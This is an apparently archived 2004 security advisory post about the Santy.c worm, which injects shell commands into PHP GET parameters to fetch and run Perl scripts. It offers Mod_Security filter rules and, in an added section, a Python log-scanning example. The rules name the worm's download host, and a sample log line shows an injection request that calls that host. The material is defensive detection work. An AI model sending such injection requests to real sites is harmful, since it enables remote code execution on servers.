On behalf of the Security Community I have been asked to spread the word on this threat as it is very real and growing worse as time passes.

Posted on Saturday, 25 December 2004 @ 16:33:38 EST by Paul Laudanski at http://castlecops.com/

Folks, it seems that the Santy worm has taken on a new strain. It also searches Yahoo now in addition to Google, but it looks for any PHP scripts with all possible arguments passed through in the HTTP GET. This worm tries all arguments in your PHP script to throw in shell commands that access a particular website, download some text files into /tmp, and then execute them using Perl. If you are using Mod_Security, you might want to try something like this (it's working for us so far):

SecFilter "visualcoders\.net/spy\.gif\?\&cmd"
SecFilter ":/"
Just in case the URL changes, the latter should still get all sorts of:


Naturally, the latter also filters on


It is Christmas after all, so a quick patch to throw HTTP 406s at the requester works through the above.

The new strain is now called Santy.c

Merry Christmas and be prepared.
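To see what the two SecFilter patterns above actually catch, here is an added example (not from the original post or from the Mod_Security project) that applies the same regexes to the decoded query string of requests parsed from constructed Apache access-log lines; the log lines, hostnames and the `PLACEHOLDER` value are made up for illustration. The third sample line shows the caveat the post hints at: the broad `:/` rule also fires on legitimate parameters that carry a URL.

```python
import re
from urllib.parse import urlsplit, unquote

# The two SecFilter patterns from the post, as Python regexes. mod_security
# matched SecFilter regexes against the URL-decoded request, so the query
# string is decoded before the rules are applied.
RULES = [
    ("santy_c_url", re.compile(r"visualcoders\.net/spy\.gif\?\&cmd")),
    ("colon_slash", re.compile(r":/")),
]

# Constructed sample access-log lines (not real traffic). Only the request
# field is parsed; the rest of each line follows the combined log format.
SAMPLE_LOG = """\
10.0.0.1 - - [25/Dec/2004:16:30:00 -0500] "GET /viewtopic.php?t=1 HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.0.2 - - [25/Dec/2004:16:30:05 -0500] "GET /index.php?page=http://visualcoders.net/spy.gif?&cmd=PLACEHOLDER HTTP/1.1" 200 77 "-" "-"
10.0.0.3 - - [25/Dec/2004:16:30:09 -0500] "GET /go.php?url=http%3A%2F%2Fwww.example.org%2F HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Pulls the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def scan_request(path: str) -> list[str]:
    """Return the names of every rule the decoded query string triggers."""
    query = unquote(urlsplit(path).query)
    return [name for name, rx in RULES if rx.search(query)]


def scan_log(text: str) -> list[tuple[str, list[str]]]:
    """Return (request_target, matched_rules) for each request that hits a rule."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        matched = scan_request(m.group(1))
        if matched:
            hits.append((m.group(1), matched))
    return hits


if __name__ == "__main__":
    for target, matched in scan_log(SAMPLE_LOG):
        print(f"{target} -> {', '.join(matched)}")
```

Running it flags the second line on both rules and the third (a harmless redirect parameter) on `:/` only, which is the trade-off to weigh before deploying the second filter on a site whose scripts legitimately accept URLs.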